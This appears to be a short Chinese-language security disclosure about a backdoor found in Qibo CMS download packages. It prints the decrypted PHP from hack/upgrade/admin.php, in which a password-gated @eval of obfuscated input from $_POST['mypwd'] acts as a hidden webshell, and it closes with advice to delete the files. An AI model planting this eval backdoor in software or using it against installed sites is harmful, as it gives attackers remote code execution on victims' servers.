齐博cms整站系统 后门文件 ../hack/upgrade/admin.php CRC32 28510105 以及剩下的存在于博客系统 下载系统 考试系统 黄页系统 新闻媒体系统 图片系统 视频系统 知道系统 企业系统 B2B系统 等等(反正官网所有的下载包里都有这个后门)文件在 ../hack/upgrade/admin.php CRC32 5101A2EE 两个后门文件虽然CRC32值不同,不过解密后代码是相同的,采用威盾加密,V7的如下:
解密代码见:http://blog.99tk.cn/wp-content/uploads/2015/03/20150319-141011-336.txt 其余的如下:
解密代码见:http://blog.99tk.cn/wp-content/uploads/2015/03/20150319-141147-926.txt 加密后代码长,不贴了,解密后代码如下:
if($_POST['mypwd']){
require_once(dirname(__FILE__)."/../../inc/qq.api.php");
@eval(qqmd5("UV9AGx4fXkEQRAgeGkFFExhCWVELFglVQkwFVgwdAVgcREgWERQRUQsaQllFERtfe55b74ae89",'DE',$_POST['mypwd']));//这是什么呢?
}
if($job=="get"&&$Apower[upgrade_ol])
{
hack_admin_tpl('get');
}
elseif($action=="get"&&$Apower[upgrade_ol])
{
$fileurl="http://down.qibosoft.com/upgrade.zip";
if($code=file_get_contents($fileurl))
{
write_file(ROOT_PATH."cache/upgrade.zip",$code);
}
elseif($code=file($fileurl))
{
write_file(ROOT_PATH."cache/upgrade.zip",$code);
}
elseif(copy($fileurl,ROOT_PATH."cache/upgrade.zip"))
{
}
elseif($code=sockOpenUrl($fileurl))
{
write_file(ROOT_PATH."cache/upgrade.zip",$code);
}
require_once(ROOT_PATH."inc/class.z.php");
$z = new Zip;
makepath(ROOT_PATH."cache/upgrade");
$z->Extract(ROOT_PATH."cache/upgrade.zip",ROOT_PATH."cache/upgrade");
unlink(ROOT_PATH."cache/upgrade.zip");
echo "";
exit;
}
对于该后门的分析可以见这儿如图:
漏洞修补建议:把后门都删除掉,然后仔细检查一片看看有没有其他漏洞,别老等着白帽子黑客帮你们发现漏洞